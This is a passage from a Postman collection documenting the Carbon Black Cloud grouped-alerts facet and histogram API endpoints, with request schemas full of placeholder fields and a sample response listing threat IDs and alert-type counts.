\"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"user_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"backend_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"detection_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"first_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"last_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"category\": [\n      \"THREAT\"\n    ],\n    \"minimum_severity\": \"&lt;integer&gt;\",\n    \"reason_code\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"primary_event_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"policy_applied\": [\n      \"APPLIED\"\n    ],\n    \"run_state\": [\n      \"UNKNOWN\",\n      \"DID_NOT_RUN\"\n    ],\n    \"sensor_action\": [\n      \"TERMINATE\",\n      \"DENY\"\n    ],\n    \"workflow_status\": [\n      \"OPEN\",\n      \"CLOSED\"\n    ],\n    \"workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"workflow_changed_by_type\": [\n      \"SUPPRESSION\",\n      \"MDR\"\n    ],\n    \"workflow_changed_by_autoclose_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_closure_reason\": [\n      \"&lt;string&gt;\"\n    ],\n    \"determination_value\": [\n      \"TRUE_POSITIVE\",\n      \"FALSE_POSITIVE\"\n    ],\n    \"determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"determination_changed_by_type\": [\n      \"OPERATOR_UNKNOWN\"\n    ],\n    \"tags\": [\n      \"&lt;string&gt;\"\n    ],\n    \"alert_notes_present\": \"&lt;boolean&gt;\",\n    \"threat_notes_present\": \"&lt;boolean&gt;\",\n    \"device_id\": [\n      \"&lt;long&gt;\"\n    ],\n    \"device_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_uem_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy_id\": [\n      \"&lt;long&gt;\",\n      \"&lt;long&gt;\"\n    ],\n    \"device_target_value\": [\n      \"LOW\",\n      \"MEDIUM\"\n    ],\n    \"device_os\": [\n      \"LINUX\",\n      \"MAC\"\n    ],\n    \"device_os_version\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_location\": [\n      \"UNKNOWN\",\n      \"ONSITE\"\n    ],\n    \"device_external_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_internal_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_category_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_pid\": [\n      \"&lt;integer&gt;\"\n    ],\n    \"process_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_effective_reputation\": [\n      \"HEURISTIC\",\n      \"RESOLVING\"\n    ],\n    \"process_reputation\": [\n      \"SUSPECT_MALWARE\",\n      \"COMPANY_WHITE_LIST\"\n    ],\n    \"process_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_certificate_authority\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_publisher\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_pid\": [\n      \"&lt;integer&gt;\"\n    ],\n    \"parent_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_effective_reputation\": [\n      \"IGNORE\",\n      \"HEURISTIC\"\n    ],\n    \"parent_reputation\": [\n      \"ADMIN_RESTRICT_OBSOLETE\",\n      \"LOCAL_WHITE\"\n    ],\n    \"parent_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_effective_reputation\": [\n      \"SUSPECT_MALWARE\",\n      \"ADWARE\"\n    ],\n    \"childproc_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_port\": [\n      \"&lt;integer&gt;\"\n    ],\n    \"netconn_local_port\": [\n      \"&lt;integer&gt;\"\n    ],\n    \"netconn_protocol\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_domain\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv4\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv4\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv6\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv6\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_category\": [\n      \"RISKY_PROGRAM\",\n      \"NON_MALWARE\"\n    ],\n    \"ttps\": [\n      \"&lt;string&gt;\"\n    ],\n    \"attack_tactic\": [\n      \"&lt;string&gt;\"\n    ],\n    \"attack_technique\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_link\": [\n      \"&lt;string&gt;\"\n    ],\n    \"watchlists_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"watchlists_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_policy_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_policy\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_rule\": [\n      \"&lt;string&gt;\"\n    ],\n    \"cluster_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"namespace\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workload_kind\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workload_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"replica_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"connection_type\": [\n      \"INTERNAL_OUTBOUND\",\n      \"INTERNAL_INBOUND\"\n    ],\n    \"egress_group_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"egress_group_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ip_reputation\": [\n      \"&lt;integer&gt;\"\n    ],\n    \"remote_is_private\": \"&lt;boolean&gt;\",\n    \"remote_namespace\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_replica_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_workload_kind\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_workload_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"tms_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"product_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"product_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"external_device_friendly_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"serial_number\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_effective_reputation\": [\n      \"COMPANY_WHITE_LIST\",\n      \"ADWARE\"\n    ],\n    \"ml_classification_final_verdict\": [\n      \"NOT_CLASSIFIED\",\n      \"ANOMALOUS\"\n    ],\n    \"ml_classification_global_prevalence\": [\n      \"LOW\",\n      \"MEDIUM\"\n    ],\n    \"ml_classification_org_prevalence\": [\n      \"LOW\",\n      \"HIGH\"\n    ],\n    \"mdr_alert\": \"&lt;boolean&gt;\",\n    \"mdr_workflow_status\": [\n      \"IN_PROGRESS\",\n      \"RESPONSE_RECEIVED\"\n    ],\n    \"mdr_workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"mdr_workflow_is_assigned\": \"&lt;boolean&gt;\",\n    \"mdr_determination_value\": [\n      \"NONE\",\n      \"NOT_REVIEWED\"\n    ],\n    \"mdr_determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"mdr_alert_notes_present\": \"&lt;boolean&gt;\",\n    \"mdr_threat_notes_present\": \"&lt;boolean&gt;\"\n  },\n  \"filter_values\": \"&lt;boolean&gt;\"\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","alerts","v7","orgs","{{cb_org_key}}","grouped_alerts","_facet"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"cb20b272-2a5c-489f-829f-a5cc4acf6ccf","name":"Facet Alerts - grouped","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"group_by\": {\n        \"field\": \"THREAT_ID\"\n    },\n    \"terms\": {\n        \"fields\": [\n            \"type\",\n            \"THREAT_ID\"\n        ],\n        \"rows\": 3\n    },\n    \"criteria\": {\n        \"minimum_severity\": \"3\"\n    },\n    \"exclusions\": {\n        \"type\": [\n            \"HOST_BASED_FIREWALL\",\n            \"CONTAINER_RUNTIME\"\n        ]\n    },\n    \"filter_values\": true\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/grouped_alerts/_facet"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 17 Apr 2023 18:11:33 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"233"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=FA29F3A892F2EBBC0A3029736BA763B4; Path=/api/alerts; Secure; HttpOnly"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"results\": [\n        {\n            \"field\": \"threat_id\",\n            \"values\": [\n                {\n                    \"total\": 1,\n                    \"id\": \"0569620088E6669121E38D9A64DBC24E\",\n                    \"name\": \"0569620088E6669121E38D9A64DBC24E\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"09c6f8b90b423b31ec17b29f6b714af5\",\n                    \"name\": \"09c6f8b90b423b31ec17b29f6b714af5\"\n                },\n                {\n                    \"total\": 1,\n                    \"id\": \"0cf248835fc0f330c8e8176ec69aa3d9\",\n                    \"name\": \"0cf248835fc0f330c8e8176ec69aa3d9\"\n                }\n            ]\n        },\n        {\n            \"field\": \"type\",\n            \"values\": [\n                {\n                    \"total\": 7,\n                    \"id\": \"NETWORK_TRAFFIC_ANALYSIS\",\n                    \"name\": \"NETWORK_TRAFFIC_ANALYSIS\"\n                },\n                {\n                    \"total\": 5,\n                    \"id\": \"WATCHLIST\",\n                    \"name\": \"WATCHLIST\"\n                },\n                {\n                    \"total\": 5,\n                    \"id\": \"CB_ANALYTICS\",\n                    \"name\": \"CB_ANALYTICS\"\n                }\n            ]\n        }\n    ]\n}"}],"_postman_id":"f4df2d0e-1ccc-4b31-ac0d-4f5ba0e48323"},{"name":"Get alert histogram for grouped alerts","id":"2ff08101-134e-45fe-83ab-e8e2594da628","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"group_by\": {\n        \"field\": \"THREAT_ID\"\n    },\n    \"bucket_size\": \"+5DAY\",\n    \"field\": \"LAST_EVENT_TIMESTAMP\",\n    \"min_count\": 0\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/grouped_alerts/_histogram","description":"<p>Get statistics about the Alerts when grouped by Threat Id. This is designed for use by the widget in the Carbon Black Cloud console.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.alerts</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/alerts-api/#alert-search\">See Documentation</a></p>\n<h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"bucket_size\": \"&lt;string&gt;\",\n  \"group_by\": {\n    \"field\": \"THREAT_ID\"\n  },\n  \"query\": \"&lt;string&gt;\",\n  \"time_range\": {\n    \"start\": \"&lt;dateTime&gt;\",\n    \"end\": \"&lt;dateTime&gt;\",\n    \"range\": \"&lt;string&gt;\"\n  },\n  \"criteria\": {\n    \"org_key\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"type\": [\n      \"HOST_BASED_FIREWALL\",\n      \"DEVICE_CONTROL\"\n    ],\n    \"backend_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"user_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"backend_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"detection_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"first_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"last_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"category\": [\n      \"MONITORED\",\n      \"MONITORED\"\n    ],\n    \"minimum_severity\": \"&lt;integer&gt;\",\n    \"reason_code\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"threat_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"primary_event_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"policy_applied\": [\n      \"NOT_APPLIED\",\n      \"NOT_APPLIED\"\n    ],\n    \"run_state\": [\n      \"UNKNOWN\",\n      \"DID_NOT_RUN\"\n    ],\n    \"sensor_action\": [\n      \"ALLOW\",\n      \"DENY\"\n    ],\n    \"workflow_status\": [\n      \"IN_PROGRESS\",\n      \"OPEN\"\n    ],\n    \"workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"workflow_changed_by_type\": [\n      \"USER\",\n      \"ML\"\n    ],\n    \"workflow_changed_by_autoclose_rule_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_closure_reason\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"determination_value\": [\n      \"FALSE_POSITIVE\",\n      \"FALSE_POSITIVE\"\n    ],\n    \"determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"determination_changed_by_type\": [\n      \"OPERATOR_UNKNOWN\",\n      \"USER\"\n    ],\n    \"tags\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"alert_notes_present\": \"&lt;boolean&gt;\",\n    \"threat_notes_present\": \"&lt;boolean&gt;\",\n    \"device_id\": [\n      \"&lt;long&gt;\",\n      \"&lt;long&gt;\"\n    ],\n    \"device_name\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"device_uem_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy_id\": [\n      \"&lt;long&gt;\",\n      \"&lt;long&gt;\"\n    ],\n    \"device_target_value\": [\n      \"LOW\",\n      \"MISSION_CRITICAL\"\n    ],\n    \"device_os\": [\n      \"MAC\",\n      \"OTHER\"\n    ],\n    \"device_os_version\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"device_username\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"device_location\": [\n      \"UNKNOWN\",\n      \"ONSITE\"\n    ],\n    \"device_external_ip\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"device_internal_ip\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_type\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_name\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"rule_category_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"rule_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"process_guid\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"process_pid\": [\n      \"&lt;integer&gt;\",\n      \"&lt;integer&gt;\"\n    ],\n    \"process_name\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"process_sha256\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"process_md5\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"process_effective_reputation\": [\n      \"NOT_SUPPORTED\",\n      \"TRUSTED_WHITE_LIST\"\n    ],\n    \"process_reputation\": [\n      \"ADMIN_RESTRICT_OBSOLETE\",\n      \"NOT_LISTED\"\n    ],\n    \"process_cmdline\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"process_username\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_certificate_authority\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_publisher\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"parent_guid\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"parent_pid\": [\n      \"&lt;integer&gt;\",\n      \"&lt;integer&gt;\"\n    ],\n    \"parent_name\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"parent_sha256\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"parent_md5\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"parent_effective_reputation\": [\n      \"RESOLVING\",\n      \"NOT_SUPPORTED\"\n    ],\n    \"parent_reputation\": [\n      \"HEURISTIC\",\n      \"HEURISTIC\"\n    ],\n    \"parent_cmdline\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"parent_username\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_guid\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_name\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_sha256\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_md5\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_effective_reputation\": [\n      \"COMPANY_WHITE_LIST\",\n      \"KNOWN_MALWARE\"\n    ],\n    \"childproc_username\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_cmdline\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_port\": [\n      \"&lt;integer&gt;\",\n      \"&lt;integer&gt;\"\n    ],\n    \"netconn_local_port\": [\n      \"&lt;integer&gt;\",\n      \"&lt;integer&gt;\"\n    ],\n    \"netconn_protocol\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_domain\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ip\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ip\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv4\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv4\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv6\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv6\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"threat_category\": [\n      \"UNKNOWN\",\n      \"RISKY_PROGRAM\"\n    ],\n    \"ttps\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"attack_tactic\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"attack_technique\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"report_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"report_name\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"report_link\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"watchlists_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"watchlists_name\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_policy_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_policy\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_rule_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_rule\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"cluster_name\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"namespace\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"workload_kind\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"workload_name\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"replica_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"connection_type\": [\n      \"INTERNAL_OUTBOUND\",\n      \"INTERNAL_OUTBOUND\"\n    ],\n    \"egress_group_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"egress_group_name\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"ip_reputation\": [\n      \"&lt;integer&gt;\",\n      \"&lt;integer&gt;\"\n    ],\n    \"remote_is_private\": \"&lt;boolean&gt;\",\n    \"remote_namespace\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"remote_replica_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"remote_workload_kind\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"remote_workload_name\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"tms_rule_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"threat_name\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_name\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"product_name\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"product_id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"external_device_friendly_name\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"serial_number\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_name\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_sha256\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_md5\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_effective_reputation\": [\n      \"GRAY_OBSOLETE\",\n      \"COMPROMISED_OBSOLETE\"\n    ],\n    \"ml_classification_final_verdict\": [\n      \"NOT_ANOMALOUS\",\n      \"NOT_CLASSIFIED\"\n    ],\n    \"ml_classification_global_prevalence\": [\n      \"MEDIUM\",\n      \"MEDIUM\"\n    ],\n    \"ml_classification_org_prevalence\": [\n      \"LOW\",\n      \"MEDIUM\"\n    ],\n    \"mdr_alert\": \"&lt;boolean&gt;\",\n    \"mdr_workflow_status\": [\n      \"TRIAGE_COMPLETE\",\n      \"TRIAGE_COMPLETE\"\n    ],\n    \"mdr_workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"mdr_workflow_is_assigned\": \"&lt;boolean&gt;\",\n    \"mdr_determination_value\": [\n      \"NOT_ENOUGH_INFO\",\n      \"UNLIKELY_THREAT\"\n    ],\n    \"mdr_determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"mdr_alert_notes_present\": \"&lt;boolean&gt;\",\n    \"mdr_threat_notes_present\": \"&lt;boolean&gt;\"\n  },\n  \"exclusions\": {\n    \"org_key\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"id\": [\n      \"&lt;string&gt;\",\n      \"&lt;string&gt;\"\n    ],\n    \"type\": [\n      \"WATCHLIST\",\n      